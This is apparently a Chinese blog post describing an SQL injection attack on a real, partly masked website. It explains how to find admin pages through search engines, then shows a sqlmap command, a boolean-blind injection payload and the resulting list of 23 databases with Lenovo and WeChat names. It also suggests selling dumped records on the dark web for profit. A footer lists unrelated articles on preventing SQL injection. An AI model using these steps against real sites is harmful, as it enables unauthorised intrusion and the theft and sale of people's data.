某站点存在SQL注入,直接可进行脱库(实战可参考此方法)

简介: 某站点存在SQL注入,直接可进行脱库(实战可参考此方法)

       首先选择需要扫描的站点,最简单粗暴的方法就是浏览器直接搜索,什么?不会?自行gu狗吧。
比如我要扫描后台,看得懂的扣1,看不懂的也扣1。

然后,你就可以看到好多好多网站的后台,随便点一个进去,慢慢折腾。
就这样的方法,搞到一SQL注入点

python sqlma.py -u http://dianping.******com.cn/valuation/index.php/index/search?k=think --dbs

python大法好,sqlmap大法更好。不会用的自行gu狗
注入点注入,得到数据库

Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm
---
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm
---
back-end DBMS: MySQL 5
available databases [23]:
[*] antispam
[*] information_schema
[*] lenovo_osd
[*] lenovo_report
[*] lenovovaluation
[*] lenovovaluation_test
[*] lenovoweixin
[*] lwttest
[*] mysql
[*] performance_schema
[*] report
[*] rrwechat
[*] test
[*] testa
[*] valuation_uat
[*] vmall
[*] vmall_test
[*] weixin
[*] weixin_ceshi
[*] weixin_test
[*] weixin_uat
[*] wxshopuat
[*] yunyingweixin

随便进入一个表,


这信息好像并没有什么ruan用,但是,仅仅只是这信息没什么用而已,在某些“下面的网”一条信息 可能就价值一两块,你有几百万条数据,不直接迎娶白富美,走向人生巅峰。(也有可能送你一副白金手镯 手动滑稽0.0)

相关文章
|
2月前
|
SQL 监控 安全
Flask 框架防止 SQL 注入攻击的方法
通过综合运用以上多种措施,Flask 框架可以有效地降低 SQL 注入攻击的风险,保障应用的安全稳定运行。同时,持续的安全评估和改进也是确保应用长期安全的重要环节。
162 71
|
2月前
|
SQL 数据库 UED
SQL性能提升秘籍:5步优化法与10个实战案例
在数据库管理和应用开发中,SQL查询的性能优化至关重要。高效的SQL查询不仅可以提高应用的响应速度,还能降低服务器负载,提升用户体验。本文将分享SQL优化的五大步骤和十个实战案例,帮助构建高效、稳定的数据库应用。
98 3
|
2月前
|
SQL 安全 PHP
PHP开发中防止SQL注入的方法,包括使用参数化查询、对用户输入进行过滤和验证、使用安全的框架和库等,旨在帮助开发者有效应对SQL注入这一常见安全威胁,保障应用安全
本文深入探讨了PHP开发中防止SQL注入的方法,包括使用参数化查询、对用户输入进行过滤和验证、使用安全的框架和库等,旨在帮助开发者有效应对SQL注入这一常见安全威胁,保障应用安全。
70 4
|
2月前
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
67 2
|
2月前
|
SQL BI 数据库
SQL操作的一些基本方法
【10月更文挑战第27天】SQL操作的一些基本方法
46 3
|
2月前
|
SQL 监控 固态存储
SQL优化有哪些方法?
【10月更文挑战第27天】SQL优化有哪些方法?
59 3
|
2月前
|
SQL 缓存 监控
SQL性能提升指南:五大优化策略与十个实战案例
在数据库性能优化的世界里,SQL优化是提升查询效率的关键。一个高效的SQL查询可以显著减少数据库的负载,提高应用响应速度,甚至影响整个系统的稳定性和扩展性。本文将介绍SQL优化的五大步骤,并结合十个实战案例,为你提供一份详尽的性能提升指南。
63 0
|
3月前
|
SQL 安全 关系型数据库
SQL语句中表名通配符的使用技巧与方法
在SQL查询中,通配符通常用于匹配字符串数据,如列值中的部分字符
|
3月前
|
SQL 数据可视化 BI
SQL语句及查询结果解析:技巧与方法
在数据库管理和数据分析中,SQL语句扮演着至关重要的角色
|
3月前
|
SQL 数据库 索引
SQL语句实现投影连接:技巧与方法详解
在SQL数据库操作中,投影连接(Projection Join)是一种常见的数据查询技术,它结合了投影(Projection)和连接(Join)两种操作
下一篇
开通oss服务